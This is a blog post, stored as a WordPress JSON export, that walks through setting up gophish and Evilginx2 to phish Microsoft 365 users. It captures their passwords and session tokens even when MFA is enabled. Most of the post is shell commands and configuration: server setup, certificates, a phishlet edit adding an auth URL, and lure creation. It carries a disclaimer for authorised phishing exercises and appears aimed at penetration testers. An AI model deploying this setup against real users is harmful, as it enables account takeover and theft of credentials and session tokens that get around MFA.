{"id":883,"date":"2022-06-02T06:06:31","date_gmt":"2022-06-02T06:06:31","guid":{"rendered":"https:\/\/zineausa.com\/blog\/?p=883"},"modified":"2024-10-11T02:02:49","modified_gmt":"2024-10-11T02:02:49","slug":"phishing-o365-with-mfa-using-gophish-and-evilginx2","status":"publish","type":"post","link":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","title":{"rendered":"Phishing O365 with MFA using gophish and Evilginx2"},"content":{"rendered":"\n

This guide is to help with the setup of gophish <\/a>to track clicks, and Evilginx2<\/a> to capture tokens and creds for O365 logins. This will work even if MFA is enabled on the target accounts.<\/p>\n\n\n\n

Update as of 10\/10\/24:<\/strong> There is an official integration now here that you should probably follow, however, the Evilginx setup part of this guide should still be relevant. https:\/\/breakdev.org\/evilginx-3-3-go-phish<\/a><\/p>\n\n\n\n

DISCLAIMER: This is for research purposes only, or for security folks with written approval to do phishing exercises. Please do not use this for evil.<\/strong><\/p>\n\n\n\n

Step 1: Setup gophish<\/h2>\n\n\n\n

We are using AWS cause it’s not a good idea to try to use Azure to phish o365 creds – go figure. Standing up a default ubuntu EC2 instance, it’s OS is 22.04 for those that are wondering. You’ll also want to register a domain you want to use for this.<\/p>\n\n\n\n

Grab the installer off their site, install screen and unzip, and run the server (we are using screen so we can manage it later)<\/p>\n\n\n\n

wget https:\/\/github.com\/gophish\/gophish\/releases\/download\/v0.11.0\/gophish-v0.11.0-linux-64bit.zip<\/code>
apt install unzip screen
screen
chmod +x gophish
.\/gophish<\/code><\/pre>\n\n\n\n
Now.. open port 3333 and 80, and 443 for your security groups, cause you’re going to want admin access, and general web access. Can limit 3333 to your home public ip only if you like.<\/p>\n\n\n\n
You have to change the config file, to have the listen url be 0.0.0.0 for admin if you want remote admin access, which we do. Now go ahead and restart gophish with `.\/gophish`<\/p>\n\n\n\n
Point your DNS at your server for www and @.<\/p>\n\n\n\n
Next we have to get the cert – so we install certbot<\/a> with the following (first turn off gophish again temporarily):<\/p>\n\n\n\n
sudo -s\napt install snapd\nsudo snap install core; sudo snap refresh core\nsudo snap install --classic certbot\nsudo ln -s \/snap\/bin\/certbot \/usr\/bin\/certbot\nsudo certbot certonly --standalone\n#follow the prompts on the screen for your domain\ncp \/etc\/letsencrypt\/live\/oncallcm.com\/fullchain.pem .\ncp \/etc\/letsencrypt\/live\/oncallcm.com\/privkey.pem .\nvi config.json #(and replace the phish server and admin_server certs with those new ones - fullchain.pem is your cert, and privkey.pem is your key. Also replace 80 with 443).\n#now once those edits are done run gophish again with:\n.gophish<\/code><\/pre>\n\n\n\n
Your config file should look like this once you’re done with it: <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Next you should be setting up your landing profiles, and user profiles, and sending profile<\/a> as you usually do with gophish. I have a guide<\/a> on how to use O365 as a sending profile but I recommend you use google workspaces instead – it’s much easier. O365 will limit your outbound emails to about 25 per hour fyi.<\/p>\n\n\n\n
Some tips: For email templates, “{{.FirstName}}” and “{{.URL}}” is to template in the landing url and email.<\/p>\n\n\n\n
Step 2: Setup Evilginx2<\/h2>\n\n\n\n
Okay – so now we need to direct the landing page to go to Evilginx2 for MFA bypass\/session token capture. If you just want email\/pw you can stop at step 1.<\/p>\n\n\n\n
We are standing up another Ubuntu 22.04 server, and another domain cause Evilginx2 stands up its own DNS server for cert stuff.<\/p>\n\n\n\n
Now follow the instructions below to get evilginx started:<\/p>\n\n\n\n
sudo apt-get -y install git make screen golang\ngit clone https:\/\/github.com\/kgretzky\/evilginx2.git\ncd evilginx2\nmake\nscreen\nsudo .\/build\/evilginx -p .\/phishlets -t .\/redirectors -developer\nconfig domain <domain>\nconfig ip <ip address>\n#Now exit and edit the following file adding a DNS and switching DNSStubListener to no, see below for an example\nvi \/etc\/resolv.conf\nsudo ln -sf \/run\/systemd\/resolve\/resolv.conf \/etc\/resolv.conf \nreboot #reboots your server\ncd evilginx2\nsudo .\/build\/evilginx -p .\/phishlets -t .\/redirectors -developer<\/code><\/pre>\n\n\n\n
\"\"
resolv.conf<\/figcaption><\/figure>\n\n\n\n
Now, point your domain’s DNS at at the server, don’t forget to open port 80, 443, and 53 on this server in addition to 22 if you need it at the security group level. If you’re using Godaddy you may need another domain to resolve ns1.<domain>.com and ns2.<domain>.com to your nameserver and point the domain to the ns1 and ns2.<\/p>\n\n\n\n
Next we have to fix the phishlet, open o365.yaml in the phishlets folder and add the following line:<\/p>\n\n\n\n
auth_urls\n - '\/kmsi*'<\/code><\/pre>\n\n\n\n
Should look like this when done:<\/p>\n\n\n\n
\"\"
o365.yaml<\/figcaption><\/figure>\n\n\n\n
Now host the server again in screen and generate your phishlets and lures<\/p>\n\n\n\n
sudo .\/bin\/evilginx -p .\/phishlets\/\nphishlets hostname o365 <subdomain.DOMAIN>\nphishlets enable o365\n\nlures create o365\nlures edit 0 redirect_url https:\/\/www.google.com\nlures get-url 0\n<\/code><\/pre>\n\n\n\n
Beautiful. Now copy that url into gophish as a button or whatever and you should be done. Use sessions [number]<\/code> to see the results once you’ve captured creds. <\/p>\n\n\n\n
If you need help getting evidence for your client that you can use the tokens to login, check out my guide here<\/a> for that.<\/p>\n","protected":false},"excerpt":{"rendered":"
This guide is to help with the setup of gophish to track clicks, and Evilginx2 to capture tokens and creds for O365 logins. This will work even if MFA is enabled on the target accounts. Update as of 10\/10\/24: There is an official integration now here that you should probably follow, however, the Evilginx setup […]<\/p>\n","protected":false},"author":1,"featured_media":904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-883","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"yoast_head":"\nPhishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog<\/title>\n<meta name=\"description\" content=\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog\" \/>\n<meta property=\"og:description\" content=\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/\" \/>\n<meta property=\"og:site_name\" content=\"Zinea InfoSec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/zineausa\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-02T06:06:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-11T02:02:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Zinea\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:site\" content=\"@ZineaLLC\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zinea\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"},\"author\":{\"name\":\"Zinea\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\"},\"headline\":\"Phishing O365 with MFA using gophish and Evilginx2\",\"datePublished\":\"2022-06-02T06:06:31+00:00\",\"dateModified\":\"2024-10-11T02:02:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"},\"wordCount\":588,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\",\"name\":\"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"datePublished\":\"2022-06-02T06:06:31+00:00\",\"dateModified\":\"2024-10-11T02:02:49+00:00\",\"description\":\"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#primaryimage\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/evilginx_blog_title2.jpg\",\"width\":1280,\"height\":720},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/2022\\\/06\\\/phishing-o365-with-mfa-using-gophish-and-evilginx2\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Phishing O365 with MFA using gophish and Evilginx2\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"name\":\"Zinea InfoSec Blog\",\"description\":\"Cyber Security Resources\",\"publisher\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#organization\",\"name\":\"Zinea LLC\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"contentUrl\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/05\\\/zinea-square.png\",\"width\":876,\"height\":876,\"caption\":\"Zinea LLC\"},\"image\":{\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/zineausa\\\/\",\"https:\\\/\\\/x.com\\\/ZineaLLC\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zineausa.com\\\/blog\\\/#\\\/schema\\\/person\\\/e3c58d4f0650f7fb571c01fcf836b1d0\",\"name\":\"Zinea\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g\",\"caption\":\"Zinea\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog","description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","og_locale":"en_US","og_type":"article","og_title":"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog","og_description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","og_url":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","og_site_name":"Zinea InfoSec Blog","article_publisher":"https:\/\/www.facebook.com\/zineausa\/","article_published_time":"2022-06-02T06:06:31+00:00","article_modified_time":"2024-10-11T02:02:49+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","type":"image\/jpeg"}],"author":"Zinea","twitter_card":"summary_large_image","twitter_creator":"@ZineaLLC","twitter_site":"@ZineaLLC","twitter_misc":{"Written by":"Zinea","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#article","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"},"author":{"name":"Zinea","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0"},"headline":"Phishing O365 with MFA using gophish and Evilginx2","datePublished":"2022-06-02T06:06:31+00:00","dateModified":"2024-10-11T02:02:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"},"wordCount":588,"commentCount":0,"publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","url":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/","name":"Phishing O365 with MFA using gophish and Evilginx2 - Zinea InfoSec Blog","isPartOf":{"@id":"https:\/\/zineausa.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"image":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage"},"thumbnailUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","datePublished":"2022-06-02T06:06:31+00:00","dateModified":"2024-10-11T02:02:49+00:00","description":"A techincal guide on how to implement a phishing architecture using gophish and Evilginx2 for security assessments.","breadcrumb":{"@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#primaryimage","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2022\/06\/evilginx_blog_title2.jpg","width":1280,"height":720},{"@type":"BreadcrumbList","@id":"https:\/\/zineausa.com\/blog\/2022\/06\/phishing-o365-with-mfa-using-gophish-and-evilginx2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zineausa.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Phishing O365 with MFA using gophish and Evilginx2"}]},{"@type":"WebSite","@id":"https:\/\/zineausa.com\/blog\/#website","url":"https:\/\/zineausa.com\/blog\/","name":"Zinea InfoSec Blog","description":"Cyber Security Resources","publisher":{"@id":"https:\/\/zineausa.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zineausa.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zineausa.com\/blog\/#organization","name":"Zinea LLC","url":"https:\/\/zineausa.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","contentUrl":"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/05\/zinea-square.png","width":876,"height":876,"caption":"Zinea LLC"},"image":{"@id":"https:\/\/zineausa.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/zineausa\/","https:\/\/x.com\/ZineaLLC"]},{"@type":"Person","@id":"https:\/\/zineausa.com\/blog\/#\/schema\/person\/e3c58d4f0650f7fb571c01fcf836b1d0","name":"Zinea","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/81f66095634a4c974693824dc72cd0db7c7c44910d60dda2d1bf1be275ee107d?s=96&d=mm&r=g","caption":"Zinea"}}]}},"_links":{"self":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/comments?post=883"}],"version-history":[{"count":5,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883\/revisions"}],"predecessor-version":[{"id":991,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/posts\/883\/revisions\/991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media\/904"}],"wp:attachment":[{"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/media?parent=883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/categories?post=883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zineausa.com\/blog\/wp-json\/wp\/v2\/tags?post=883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}